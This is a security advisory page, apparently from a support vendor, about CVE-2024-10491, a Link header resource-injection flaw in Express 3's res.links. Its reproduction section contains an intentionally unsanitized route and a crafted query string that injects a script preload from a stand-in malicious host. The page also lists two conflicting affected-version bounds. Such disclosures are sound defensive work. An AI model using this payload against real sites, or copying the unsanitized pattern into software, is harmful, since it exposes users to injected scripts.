By clicking "Accept", you agree to the storing of cookies on your device to enhance site navigation, analyze site usage, and assist in our marketing efforts. View our Privacy Policy for more information.

Thank you! Your submission has been received!

Oops! Something went wrong while submitting the form.

View all Vulnerabilities

CVE-2024-10491

Resource Injection

Affects

Express

<=3.21.4

Express

Patch Available

This Vulnerability has been fixed in the Never-Ending Support (NES) version offered by HeroDevs

View NES Solution

Overview

A vulnerability has been identified in the Express response.links function, allowing for arbitrary resource injection in the Link header when unsanitized data is used.

The issue arises from improper sanitization in `Link` header values, which can allow a combination of characters like `,`, `;`, and `<>` to preload malicious resources.

This vulnerability is especially relevant for dynamic parameters.

Details

Module Info

Product: Express
Affected packages: Express
Affected versions: <=3.21.2
GitHub repository: https://github.com/expressjs/express
Published packages: https://www.npmjs.com/package/express
Package manager: npm

Steps To Reproduce

Create an Express application and configure res.links to set value from query param:

var express = require('express')
var app = express()

app.get('/', function (req, res) {
  res.links({"preload": req.query.resource});
  res.send('ok');
});
  
app.listen(3000);

‍

Use a specially-crafted payload to set multiple links header. For example:

// note how the query param uses < > to load arbitrary resource
const maliciousQueryParam = '?resource=http://api.example.com/users?resource=>; rel="preload", <http://api.malicious.com/1.js>; rel="preload"; as="script", <http:/api.example.com';

const url = `http://localhost:3000/${maliciousQueryParam}`;
fetch(url);

‍

We can note how multiple headers have been set:

<http://api.example.com/users?resource=>; rel="preload", <http://api.malicious.com/1.js>; rel="preload"; as="script", <http:/api.example.com>; rel="preload"

‍

Proof Of Concept

‍

A full reproduction with code similar to the above can be found here:

<source> resource injection vulnerability POC

‍

Credits

Abze

Mitigation

The Express project is End-of-Life and will not receive any updates to address this issue. For more information see here.

Users of the affected components should apply one of the following mitigations:

Migrate affected applications away from Express 3.
Leverage a commercial support partner like HeroDevs for post-EOL security support.

Stay secure and ensure your systems are updated with the latest patches from HeroDevs. For more insights and security updates, keep following our blog.